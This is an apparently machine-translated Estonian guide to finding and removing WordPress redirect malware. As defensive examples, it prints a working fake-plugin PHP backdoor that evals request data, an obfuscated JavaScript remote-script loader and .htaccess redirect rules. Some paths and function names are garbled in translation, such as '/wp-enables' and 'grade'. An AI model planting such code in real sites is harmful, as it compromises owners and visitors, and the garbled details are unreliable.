WordPressi ümbersuunamise häkkimine? Kuidas veebisaiti puhastada?

printida · Время на чтение: 27мин · kõrval · Avaldatud · Uuendatud

mängidaKuulake seda artiklit

WordPress on nakatunud ümbersuunamise-ümbersuunamise pahavaraga. Pahatahtlik ümbersuunamine.

Pahatahtlik WordPressi ümbersuunaminePahatahtlik ümbersuunamine WordPressi. Kui teie WordPressi veebisait või administraatoripaneel suunab automaatselt ümber rämpsposti saidile, on teie veebisaiti tõenäoliselt häkitud ja see on nakatunud ümbersuunamise pahavaraga. Niisiis, mida saate teha oma saidil häkitud WordPressi ümbersuunamise pahavaraga? Kõigepealt kontrollige, kas teil on häkkimine

Oluline on meeles pidada, et aeg on siin teie parim sõber. Ärge raisake aega selle pärast muretsemisele. Parandame häkkimise täielikult ja teie saiti saab puhastada. Kuid peate kiiresti liikuma.

Juhendan teid toimingud, mis aitavad teil saidilt pahatahtlikud ümbersuunamised eemaldada, saidi parandada ja tagada, et see ei korduks. WordPressi ümbersuunamise häkkimise mitme variandi korral võib selle juurteni jõudmine olla keeruline. See artikkel aitab teil pahavara kiiresti leida ja samm-sammult eemaldada.

Artikli sisu:

Mida tähendab häkitud ümbersuunamine (pahatahtlik ümbersuunamine) WordPressis?

Häkitud WordPressi ümbersuunamine on pahatahtlik ümbersuunamine.
Häkitud ümbersuunamine WordPress juhtub siis, kui teie veebisaidile süstitakse pahatahtlikku koodi, mis seejärel suunab teie külastajad automaatselt teisele veebisaidile. Tavaliselt sisaldab sihtveebisait rämpsposti, halli turu farmaatsiatooteid või ebaseaduslikke teenuseid.

Sellise käitumise põhjuseks on mitut tüüpi pahavara, näiteks faviconi pahavara, seega on WordPressi pahavara ümbersuunamise häkkimine üldnimetus, mis viitab valdavale sümptomile: pahatahtlikud ümbersuunamised.

Seda tüüpi häkkimine mõjutab miljoneid veebisaite ja põhjustab iga päev kohutavaid kaotusi. Veebisaidid kaotavad tulu, brändingut ja SEO edetabelit, rääkimata taastumisega kaasnevast stressist.

Häkkimise juures on aga kõige hullem see, et see läheb aina hullemaks. Pahavara levib failide ja kaustade ning isegi teie veebisaidi andmebaasi kaudu, kopeerides ennast ja kasutades teie veebisaiti teiste nakatamiseks.

Räägin selles artiklis hiljem häkkimise konkreetsetest tagajärgedest, kuid piisab, kui öelda, et teie veebisaidi salvestamisel on teie prioriteet tegutseda kohe ja mitte viivitada.

Kuidas ma tean, kas mu WordPressi sait suunatakse ümber rämpsposti?

Enne probleemi lahendamist häkitud WordPressi saidi ümbersuunamine, peame esmalt kindlaks tegema, et teie saiti on kindlasti häkitud. Nagu nakkuse puhul, on ka häkkidel sümptomid. Ja siis, kui olete sümptomid tuvastanud, saate mõne testiga diagnoosi kinnitada.

Nagu varem öeldud, on automaatsed ümbersuunamised kindel märk WordPressi ümbersuunamise häkkimisest. Rämpsposti ümbersuunamised võivad ilmneda otsingutulemustest, teatud lehtedelt või isegi siis, kui proovite oma veebisaidile sisse logida. Ümbersuunamiste probleem seisneb selles, et need ei toimu alati järjepidevalt või usaldusväärselt.

Näiteks kui läksite oma saidile ja see suunati ümber, ei pruugi see juhtuda teist, kolmandat või neljandat korda. Häkkerid on nutikad ja seadistavad küpsise, et tagada probleemi kordumine.

Selle tagajärjeks on see, et on lihtne sattuda võltsturvatunnesse, kui tunnete, et tegemist võib olla õnnetusega. On väike võimalus, et see võib olla koodis viga, kuid kui ma ütlen "pisike", pean silmas lõpmatult väikest võimalust.

Kontrollige, kas WordPressis on häkitud ümbersuunamise märke

Häkid avalduvad reeglina erineval viisil. Üksiti võivad need olla veebisaidi vead, näiteks vana jälgimiskood, kuid kui näete oma veebisaidil kahte või enamat neist sümptomitest, võite olla kindel, et teie veebisaiti on häkitud.

  • WordPressi sait suunab ümber rämpsposti saidile: WordPressi ümbersuunamise häkkimise klassikaline sümptom. Olenevalt pahavara variandist võib ümbersuunamine toimuda erineval viisil või teie saidi erinevates kohtades.
    Automaatsed ümbersuunamised: pahavara suunab teie külastajad automaatselt ümber rämpspostisaitidele, kui keegi teie saiti külastab. See juhtub ka siis, kui keegi läheb teie saidile Google'i või Yandexi kaudu. Tavaliselt suunatakse teid ümber ka siis, kui proovite oma saidile sisse logida.
    Lingi ümbersuunamine: keegi klõpsab lingil ja suunatakse seejärel teisele veebisaidile. See on eriti nutikas, kuna külastajad klõpsavad linkidel, oodates, et nad suunatakse nagunii teise asukohta.
    Ümbersuunamised ainult mobiilseadmetele: ainult siis, kui teie veebisaidile pääsete juurde mobiilseadme kaudu, suunatakse see ümber.
  • Google'i tulemused näitavad teadet „Sait võib olla häkitud”.: kui teie veebisait ilmub otsingutulemustes, kuvatakse väike teade: "Sait võib olla häkitud" – ilmub otse pealkirja alla. See on Google'i viis, kuidas hoiatada külastajaid potentsiaalselt häkitud saidi eest.
  • Google'i must nimekiri: suurim punane lipp – sõna otseses mõttes – Google'i must nimekiri on kindel märk, et teie saiti on häkitud. Isegi kui teie külastajad kasutavad teist otsingumootorit, kasutavad nad häkitud saitide märgistamiseks ka Google'i musta nimekirja.
  • Saidi keeld Yandexis: ka kindel märk häkitud veebisaidist, teie veebisaidi positsioonid hüppavad Yandexi otsingutulemustest välja. Võib-olla jääb avaleht alles, kuid see pole fakt.
  • Google Ads märgistab teie veebisaidil olevad skriptid: kui proovite oma veebisaidil reklaamida, roomab Google Ads teie veebisaidil ja hoiatab teid ümbersuunamisstsenaariumide eest teie postitustes või lehtedel.
  • Veebimajutaja on teie konto peatanud: Veebisaidid peatavad veebisaidid mitmel põhjusel ja pahavara on üks peamisi põhjuseid. Kui näete seda teadet, kui proovite oma veebisaidile juurde pääseda, kontrollige mingil põhjusel oma meili. Teise võimalusena võtke ühendust nende tugimeeskonnaga.
  • Inimesed kurdavad teie saidi üle: Häkkimise kohutav osa on see, et veebisaitide administraatorid saavad häkkimisest tavaliselt viimasena teada, välja arvatud juhul, kui neil on installitud hea turvaplugin. Paljud inimesed saavad sellest teada, kuna veebisaidi külastajad ja kasutajad kurdavad veebisaidi rämpsposti suunamise või isegi rämpsposti saamise üle.

Kui näete mõnda ülaltoodud sümptomitest, on hea mõte selle kohta teave üles kirjutada. Mis brauserit sa kasutasid? Mis seadet sa kasutasid? See teave aitab tuvastada WordPressi häkkimise pahavara tüüpi, millega silmitsi seisate, ja seega selle kiiremini kõrvaldada.

Kinnitage, kas teie sait on nakatunud ümbersuunamise häkkimisega

Järgmine samm sümptomi avastamiseks on veenduda, et tegemist on tõepoolest häkkimisega. Kiireim viis veendumaks, et teie veebisait on vastuvõtlik pahatahtlikele ümbersuunamistele, on veebisaidi skannimine.

1. Skannige oma saiti turbepluginaga

Kui te pole 100 % puhul ikka veel kindel, et teie veebisaiti on häkitud, kasutage kinnitamiseks tasuta võrguskännerit. Väga levinud juhtum on teie veebisaidile juurdepääs mobiilseadmest, mis viitab pahavarale .htaccess-failis. Või üks, mida me sageli näeme, on lehe häkkimine, mis suunab automaatselt ümber. See juhtub siis, kui andmebaasis on pahavara.

Hiljem artiklis vaatleme teisi pahavara variante. Praegu tahan rõhutada, et WordPressi poolt kaaperdatud otsene pahavara võib olla peaaegu kõikjal teie saidil.

Seetõttu märgistab iga skanner selle erinevalt. Näiteks märgib Quttera pahavara järgmiselt:

Ohu nimi: Heur AlienFile gen

Ja WordFence näitab hoiatust terve hulga tundmatute failide kohta, näiteks:

* Tundmatu fail WordPressi tuumas: wp-admin/css/colors/blue/php.ini
* Tundmatu fail WordPressi tuumas: wp-admin/css/colors/coffee/php.ini
* Tundmatu fail WordPressi tuumas: wp-admin /css/colors/ectoplasm/php.ini

Need on head märgid, et teie saiti on häkitud, sest nagu hiljem näeme, ei tohiks kaust /wp-admin sisaldada midagi peale teie WordPressi installi põhifailide.

Seda öeldes ei aita see kahjuks desinstallimisel. Muude turbepluginate tuvastamismehhanismide tõttu on pahavara märgistamisel mitu suurt probleemi. Seal on palju valepositiivseid tulemusi, puuduvad failid ja palju muid probleeme. Teie veebisait on oluline, seega valige oma turvaplugin targalt.

2. Skannige võrguturvaskanneriga

Häkitud ümbersuunamise pahavara kontrollimiseks võite kasutada ka veebiturvaskannerit, nagu Sucuri SiteCheck. Interneti-turvaskanner või väline skanner skannib teie lehtedel ja postitustel olevat koodi, otsides pahatahtlikke skripte.

Ainus probleem esiotsa skanneriga on see, et see saab ja skannib ainult koodi, millele tal on juurdepääs. See tähendab põhimõtteliselt lehtede ja postituste lähtekoodi. Kuigi nendel lehtedel on palju häkitud ümbersuunamise pahavara, on põhifailides mõned valikud. Väline skanner ei näita neid üldse.

Soovitan kasutada esimese rea diagnostikavahendina veebiturvaskannerit. Kui see osutub positiivseks, võite olla kindel, et see on positiivne, ja töötada häkkimise parandamisega. Kui see osutub negatiivseks, saate käsitsi kontrollida kohti, mida esiotsa skanner ei skaneeri. Nii saate osa käsitsi tööst loobuda.

3. Kontrollige saiti käsitsi pahavara suhtes

Kui kasutate häkitud ümbersuunamise pahavara otsimiseks turbepistikprogrammi, võite selle jaotise täielikult vahele jätta. Hea turbeplugin teeb täpselt seda, mida ma allpool soovitan, kuid palju kiiremini ja paremini.

Veebisaidi skannimine pahavara suhtes tähendab sisuliselt failidest ja andmebaasidest soovimatu koodi otsimist. Ma saan aru, et "rämpskood" on suunajana kasutu, kuid võimaluste tõttu pole ühtegi rida, mida saaks kiiresti leida ja häkkimisest teada anda.

Järgmises jaotises olen aga loetlenud mõned näited teistelt veebisaitidelt leitud pahavara kohta. Ja järgmises osas räägime tüüpilistest kohtadest, kuhu pahavara süstitakse, olenevalt vaadeldud ümbersuunamiskäitumisest.

Kuidas näeb välja WordPressi ümbersuunamise pahavara

Ma liialdan selle reaga selles artiklis, kuid WordPressi häkkimise ümbersuunamise pahavaral on palju võimalusi ja seega pole ühtegi standardset koodijuppi, millele osutada: "Otsige seda!"

Siiski võin anda teile aimu, kuidas mõned pahatahtlikud koodid välja näevad:

  • Kood võib olla kuskil lehe päises või tabeli wp_posts kõigil lehtedel. siin on mõned näidised:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'> type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'> type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'> type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'> type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'> src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

  • Tabelites wp_options võivad saidi URL-is olla võõrad URL-id. siin on mõned näidised:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

 

  • Skripte saab ka hägustada, mis tähendab, et tegeliku koodi eraldamiseks peate need käivitama veebipõhise deobfuskaatori kaudu.

hägustatud kood

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')

Ja mida see tegelikult tähendab:

(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • Võltsitud pistikprogrammidel võivad olla failid, mis avamisel näevad välja järgmised:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );
  • Mobiili ümbersuunamised näitavad .htaccess-faili muudatusi. Allolev kood suunab aadressile https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
RewriteEngine on RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine on RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]

Kohad, kust otsida ümbersuunatud pahavara

WordPress on jagatud kaheks põhiosaks: failid ja andmebaas. Häkitud ümbersuunamise pahavara probleem seisneb selles, et see võib olla kõikjal.

Kui olete oma veebisaidi koodi muutmisega tuttav, leiate minu mainitud ümbersuunamiskoodi järgmistest kohtadest. Kahtlaste lisandmoodulite otsimiseks laadige alla oma veebisaidi varukoopia – nii failid kui ka andmebaas.

Jällegi pidage meeles, et on olemas sellised valikud nagu klassikalised, situatsioonipõhised, seadmepõhised või isegi komplekteeritud ümbersuunamised. Kood on igaühe jaoks erinev, nagu ka asukoht.

A. Veebisaidi failid

  • WordPressi põhifailidV: Alustades kõige lihtsamatest, ei tohiks /wp-admin ja /wp-includes erineda uuest WordPressi installist. Sama kehtib failide index.php, settings.php ja load.php kohta. Need on WordPressi põhifailid ja seaded ei muuda neid. Võrrelge WordPressi värske installiga, et näha, kas seal on muudatusi. Htaccess-fail on erijuhtum. Selles failis kuvatakse peaaegu alati mobiili ümbersuunamise häkkimine. Otsige üles kasutajaagendi reegel, mis määrab seadmepõhise käitumise, ja kontrollige ümbersuunamisskripti.
  • Aktiivsed teemafailid: kui teil on installitud rohkem kui üks teema (millega ei ole soovitatav alustada), veenduge, et ainult üks neist oleks aktiivne. Seejärel vaadake üle oma aktiivsed teemafailid, nagu header.php, footer.php ja functions.php, et leida kummaline kood. Hea viis selle testimiseks on arendajate saitidelt alla laadida põlised installid ja sobitada kood nende failidega. Tavaliselt peavad need failid olema kindlas vormingus, mistõttu jääb prügikood välja. Pidage meeles, et seaded muudavad ka koodi. Samuti, kui kasutate nullitud teemasid või pistikprogramme, saate siinsamas diagnostika peatada, sest võime teile kinnitada, et teid on nende tõttu häkitud.
  • Võltsitud pistikprogrammid teie saidil: Jah, see on nii. Häkkerid maskeerivad pahavara, muutes selle võimalikult legitiimseks. Minge kausta wp-content/plugins ja vaadake. Midagi, mida te pole installinud? Mingid imelikud duplikaadid? Kas mõnel neist on ainult üks või kaks faili kaustas?

siin on mõned näidised:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Kui teil on installitud palju pistikprogramme, võib nende kõigi kontrollimine olla keeruline. Võltspluginate leidmise rusikareegel on see, et tavapäraselt algavad seaduslikud pistikprogrammide nimed harva suure algustähega ja nende nimed ei sisalda muid erimärke peale sidekriipsude. Need ei ole reeglid, vaid kokkulepped. Seetõttu ärge omistage neile võltsingute lõplikuks tuvastamiseks liiga suurt tähtsust. Kui kahtlustate, et pistikprogramm on võlts, googeldage seda ja leidke WordPressi hoidlast originaalversioon. Laadige see sealt alla ja kontrollige, kas failid ühtivad.

B. Andmebaas

  • wp_posts tabel: Pahatahtlikud skriptid on sageli igal lehel. Kuid nagu me juba ütlesime, on häkkerid väga kavalad. Enne kui otsustate, et häkkimist ei eksisteeri, vaadake head postituste näidist. Teine viis oma lehtede ja postituste koodi kontrollimiseks on kontrollida lehe lähtekoodi brauseri abil. Igal teie saidi lehel on HTML-kood, mida brauserid saavad lugeda. Avage lehe lähtekood ja kontrollige päist, jalust ja kõike skriptimärgendite vahel, et leida asju, mis tunduvad kohatu. Peajaotis sisaldab teavet, mida brauser kasutab selle lehe laadimiseks, kuid mida külastajale ei näidata. Pahavara skriptid on sageli siin peidetud, nii et need laaditakse enne ülejäänud lehte.
  • wp_options tabel: kontrollige saidi URL-i. 99% puhul peaks see olema teie veebisaidi URL. Kui ei, on see teie häkkimine siin.

Praegu pole aga õige aeg midagi eemaldada. Peate olema täiesti kindel, et Javascript või PHP skriptid on kindlasti pahatahtlikud. Soovite pahavarast väga kiiresti vabaneda, kuid kiirustamine viib teid saidile, mis on maas.

Muud viisid pahavara ümbersuunamiste kontrollimiseks

Te ei pruugi veebisaidi administraatorina näha kõiki ülaltoodud sümptomeid. Häkkerid välistavad nutikalt teie IP-aadressi ja konto häkkimise tulemuste vaatamise eest, kuna tahavad jääda võimalikult kaua avastamata.

Samuti võite seda sümptomit korra näha ja siis ei saa te seda uuesti luua. Kõik see on väga segane. Kui te neid oma veebisaidil otse ei näe, on sümptomite kontrollimiseks veel mitu võimalust.

  • Kontrollige Google'i otsingukonsooli: nad märgivad pahavaraga nakatumise jaotises Turvaprobleemid.
  • Kasutage oma veebisaidile juurdepääsuks inkognito brauseritet näha, mida tavakülastaja näeb
  • Kontrollige tegevuslogisid ebatavalise kasutajategevuse suhtes, näiteks kasutaja õiguste tõstmine või sõnumite koostamine.

Järgmine jaotis käsitleb ainult kustutamist. Hinga sügavalt sisse ja joo tass teed või kohvi. Teeme koos kogu protsessi läbi.

Kuidas eemaldada WordPressi häkitud ümbersuunamisinfektsioon?

Nüüd, kui teame, et teie veebisait suunab ümber teisele saidile, peate kiiresti tegutsema. Aja möödudes suureneb häkkimiste arv plahvatuslikult, kuna pahavara levib teie veebisaidil rohkematesse failidesse ja kaustadesse. See mitte ainult ei suurenda kahju, vaid muudab ka taastumise palju raskemaks.

Eeldan, et olete oma veebisaidil juba enne selle jaotiseni jõudmist roomanud. Kui te aga seda pole teinud, peaksite esimese asjana oma veebisaidil roomama.

Pahatahtlike ümbersuunamiste eemaldamiseks saidilt on kaks peamist viisi. Soovitan tungivalt kasutada turbepistikprogrammi, kuna olen omal nahal näinud kahju, mida häkkimised veebisaidile võivad teha.

1. (SOOVITATAV) Kasutage ümbersuunamisviiruse eemaldamiseks turbepluginat

Turvapluginaid kasutatakse raskesti tuvastatava pahavara eemaldamiseks. Kõik, mida pead tegema, on installida oma saidile pistikprogramm ja oodata mõni minut, kuni teie sait taastatakse.

Kui olete kasutanud skannerit, et kontrollida, kas teie veebisaiti on häkitud, peate ainult seda värskendama ja saidi tagasi hankima.

Selliseid pistikprogramme soovitatakse kasutada mitmel põhjusel:

  1. Eemaldage ainult pahavara ja jätke sait puutumata;
  2. Leidke tagauksed, mille häkkerid jätavad uuesti nakatumiseks, ja eemaldage need;
  3. Sisseehitatud tulemüür, mis kaitseb teie saiti pahatahtliku liikluse eest.

Kui te ei pääse juurde wp-admin

Sellisel juhul võtke abi saamiseks ühendust pahavara hädaolukorra eemaldamise teenusega. Spetsiaalne turbeekspert puhastab teie veebisaidi kiiresti ja tagab, et see kiiresti uuesti tööle hakkab.

2. Eemaldage WordPressi ümbersuunamise pahavara käsitsi

Oma veebisaidilt on võimalik käsitsi ümbersuunamise pahavara eemaldada, kuid selleks on olemas eeldused.

- Esiteks peate teadma, kuidas WordPress on konfigureeritud. Alates sellest, kuidas põhifailid välja näevad, lõpetades kaustade ja failidega, mille iga pistikprogramm ja teema loob töötamiseks. Ühe vajaliku faili kustutamine võib teie saidi krahhi, mistõttu teie saiti mitte ainult ei häkita, vaid see on ka keelatud.

- Teiseks tuleb osata eristada head koodi halvast, s.t. pahavara. Pahatahtlik kood on maskeeritud seaduslikuks koodiks või hägustatud, nii et seda ei saa lugeda. Head koodi halvast koodist on väga raske eristada, mistõttu on paljudel skanneritel valepositiivsed tulemused.

MärgeV: Pahavara eemaldamiseks võite palgata WordPressi eksperdi. Pidage meeles, et turvaeksperdid on kallid ja häkkimise eemaldamine võtab aega.

Samuti ei garanteeri nad, et te ei kordu. Soovitan siiski seda tegutsemisviisi, mitte proovida pahavara käsitsi eemaldada.

Olgu, need on hoiatused. Siin on juhised saidilt ümbersuunamise pahavara eemaldamiseks.

1. Varundage oma sait

Enne millegi tegemist tehke kindlasti varukoopia. Isegi kui sait on häkitud, töötab see ikkagi. Nii et kui pahavara eemaldamise käigus läheb midagi valesti, on teil olemas varukoopia, mille juurde tagasi pöörduda. Häkitud saiti on raske puhastada. Katkist veebisaiti on veelgi raskem puhastada ja mõnikord võimatu taastada.

Veebimajutaja võib teie saidi peatada või isegi eemaldada. Siis on teie veebisaidile juurdepääs isegi selle kraapimiseks suur probleem. Peatatud saidile juurdepääsuks peate võtma ühendust veebimajutaja tugitiimiga, kuid kustutatud saiti ei saa teha ilma varukoopiata.

2. Laadige alla WordPressi puhas versioon

Laadige alla värsked WordPressi installid ning kõik kasutatavad pistikprogrammid ja teemad. Versioonid peaksid ühtima teie saidil leiduvaga.

Pärast nende allalaadimist saate tühje faile kasutada oma veebisaidi failidega võrdlemiseks. Erinevuste leidmiseks võid kasutada veebipõhist erinevuste kontrollijat, sest kindlasti ei soovita me neid käsitsi läbi vaadata.

Põhimõtteliselt on see allkirjade sobitamine, mida enamik turvaskannereid teeb. Kuid vähemalt nüüd teate, milliseid faile ja kaustu on teie saidi nõuetekohaseks toimimiseks vaja. Ärge kustutage selles etapis midagi. Seadke lihtsalt algtaseme, et mõista, milliseid faile vaja on.

3. Otsige üles ja eemaldage ümbersuunamispahavara

See on võib-olla protsessi kõige raskem samm. Nagu ma ütlesin, peate suutma eristada head koodi halvast ja seejärel eemaldada või asendada see vastavalt vajadusele.

Puhastage WordPressi põhifailid

Äärmiselt oluline on hankida oma veebisaidiga sama WordPressi versioon, vastasel juhul võib veebisaidi krahh tekkida. Pärast üleslaadimist kasutage oma veebisaidi failidele juurdepääsuks cPaneli või FTP-d ja asendage järgmised kaustad:

— /wp-admin
/wp-enables

WordPress kasutab neid kaustu teie veebisaidi käitamiseks ja laadimiseks ning need ei ole mõeldud kasutaja sisu salvestamiseks. See oli kõige lihtsam osa. Nüüd kontrollige järgmisi faile kummalise koodi suhtes:

- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

Samuti ei tohiks kaustas /wp-uploads olla PHP-skripte. Ma mõistan, et "veider kood" on väga ebamäärane, kuid nagu me varem ütlesime, on häkitud WordPressi ümbersuunamise pahavaral palju-palju võimalusi.

Seetõttu ei saa ma teile täpselt öelda, millist koodi te üheski neist failidest näete. Kui saate aru, kuidas kood töötab, võite vaadata WordPressi failide loendit, et mõista, mida igaüks neist teeb, ja näha, kas mõni kood teeb midagi erinevat. Kui olete kindel, et olete selle koodi leidnud, kustutage see.

Puhastage teemad ja pistikprogrammid pahavarast

Kõik teema ja pistikprogrammiga seotud failid ja kaustad salvestatakse kausta /wp-content. Saate kontrollida iga oma veebisaidi faili, et näha, kus koodis on erinevusi.

Ettevaatust: kõik muutused pole halvad. Kui olete kohandanud mõnda oma pistikprogrammi või teemat (mis teil tõenäoliselt on), siis on puhta installiga võrreldes erinevusi. Kui te ei pahanda nende seadete kaotamise vastu, võite faile hulgi asendada.

Tõenäoliselt soovite oma tehtud tööd säilitada, nii et hakake kõiki erinevusi hoolikalt uurima. Kui suudate koodi loogikat järgida, saate aru, kuidas failid omavahel ja ülejäänud saidiga suhtlevad. See peaks võimaldama teil pahavara leida ja selle eemaldada.

Kui teil on märkimisväärne arv teemasid ja pistikprogramme, võib see olla heidutav ülesanne. Siin on mõned head kohad alustamiseks:

  • Aktiivsed teemafailid
    - header.php
    — footer.php
    — functions.php
  • Haavatavad pistikprogrammid
    - Kas kedagi on hiljuti häkitud
    - Kas neid pole värskendatud
  • Võlts pluginad
    - Väga vähe faile
    - Ilmsed duplikaadid

Mõned pahatahtlikud failid näevad välja kahjutud ja jäljendavad sageli päris failinimesid. Siin tulevad kasuks puhtad installid, kuid kui te pole selles täiesti kindel, võtke abi saamiseks ühendust ka pistikprogrammide ja teemade arendajatega.

Eemaldage WordPressi andmebaasist pahavara

Kasutage puhastamiseks andmebaasi üleslaadimiseks phpMyAdminit. Seejärel kontrollige tabeleid kahtlase sisu (nt rämpsposti URL-ide või märksõnade) suhtes. Eemaldage see sisu ettevaatlikult, veendudes, et see on halb kood ja mitte muudetud hea kood.

Kontrollige eelkõige järgmisi tabeleid:

— wp_options
— wp_posts

Sõltuvalt teie veebisaidi suurusest võib see võtta palju aega. Üldiselt, kui pahavara on teie tabelis wp_posts, on see igas postituses. Kui teil on sadu rohke sisuga postitusi, on käsitsi puhastamine tohutu ülesanne.

Kui olete aga pahavara skripti tuvastanud, võite kasutada SQL-i (või paluda kellelgi, kes SQL-i mõistab), et skript igast sõnumist eemaldada. Hoiatus on see, et te ei saa olla kindel, et see on ainus laual olev pahavara.

Lisaks kontrollige veelkord, eriti e-kaubanduse saitide puhul, kas eemaldate olulist kasutaja- või tellimuseteavet.

4. Eemaldage tagauksed

Nüüd, kui olete oma veebisaidi pahavarast puhastanud, kontrollige tagauksi. Need on teie veebisaidi sisenemispunktid, mille häkker jätab maha, et nad saaksid teie veebisaiti uuesti nakatada, kui nende algne häkkimine avastatakse.

Tagauksed võivad olla mitmes kohas. Mõni kood otsimiseks:

  • grade
  • base64_dekood
  • gzinflate
  • preg_replace
  • str_rot13

Ettevaatust: need ei pruugi olla kõik halvad. Need on seaduslikud PHP-skriptid, mida saab veidi muuta, et need toimiksid tagaustena. Olge ettevaatlik ilma korraliku analüüsita eemaldamisel.

5. Laadige puhastatud failid uuesti

Nüüd, kui olete häkkimise eemaldanud, peate oma saidi uuesti kokku panema. Kasutage failide uuesti üleslaadimiseks failihaldurit ja veebisaidi asendamiseks phpMyAdminit cPanelis või VestaCP-s.

See on väga sarnane varukoopia käsitsi taastamisega ja tähendab, et peate esmalt kustutama olemasolevad failid ja andmebaasi. Kui jätsite alguses kogemata varundamisetapi vahele, tehke seda kohe. Veebisaidi varundamine, isegi kui see on häkitud, säästab teie leina, kui midagi läheb valesti.

6. Tühjendage saidi vahemälu

Nüüd, kui teie puhastatud veebisait on laaditud, tühjendage vahemälu. Vahemällu salvestatakse teie lehtede ja sisu varasemad versioonid ning näidatakse neid teie saidi külastajatele. Selleks, et teie äsja puhastatud sait käituks ootuspäraselt, peate tühjendama vahemälu.

7. Kontrollige kõiki pistikprogramme ja teemasid

Kurb tõsiasi pahavara kohta on see, et see võib peituda peaaegu kõikjal. Kuna olete kulutanud kogu selle aja ja energia oma veebisaidi käsitsi puhastamisele, tasub võtta paar lisaminutit, et veenduda, et teie pingutused on edukad.

Soovitan kasutada selleks FTP-d, kuna veebisaidi failide muutmine nõuab palju tööd.

  • Keelake kõik pistikprogrammid ja teemad, nimetades kausta wp_contents ümber millekski muuks.
  • Seejärel aktiveerige need ükshaaval, kontrollides iga kord, kas teie saidil on ümbersuunamine.
  • Kui probleeme pole, siis teate, et pistikprogrammid ja teemad ei sisalda pahavara.

Miks ma tungivalt ei soovita häkkerite ümbersuunamisi käsitsi eemaldada?

Võite küsida, miks ma ei soovita häkke sel viisil kustutada. Mõelge häkkidele samamoodi, nagu mõtleksite haigusele, nagu vähk või luumurd.

Pigem jätaksite nende haiguste eest hoolitsemise arstide hooleks, kes on koolitatud spetsialistid, kellel on nende ravimisel ulatuslikud kogemused. Treenimata inimesed teevad rohkem kahju kui kasu. Küsige igalt arstilt, kes on pidanud tegelema halvasti paranenud luumurruga.

Häkkimise käsitsi eemaldamisel võivad mõned asjad valesti minna.

  • Pahatahtlik tarkvara võib levida ootamatutesse kohtadesse ja seda on raske veatult eemaldada.
  • Pahavara eemaldamisest üksi ei piisa, kui turvaauke ja/või tagauksi ei parandata.
  • Ebaõnnestunud kustutamine võib mõnikord rikkuda veebisaidi muid osi.
  • Suurte saitide (nt e-poe) käsitsi läbimine on väga keeruline ja aeganõudev.
  • Aeg on ülioluline, kuna häkid muutuvad aja jooksul eksponentsiaalselt hullemaks.
  • Kui host on teie konto blokeerinud, ei pruugi teie veebisaidile pääseda

Lihtsamalt öeldes on häkitud veebisaidil tohutu veamäär. On väga reaalne oht väljuda sellest protsessist halvemas olukorras, kui alustasite. Häkkeriskriptide eemaldamiseks on kõige parem kasutada head turbepluginat.

Veebisait suunatakse ümber rämpsposti: kuidas on see minu veebisaiti mõjutanud?

Veebisaidid on keerukad tarkvara segud ja nende tuumaks pole ükski tarkvara 100% puhul häkitav. See on iga tarkvara reaalsus, alates eilsetest 8-bitistest mängudest kuni pankade kasutatavate tohutute haldusinfosüsteemideni.

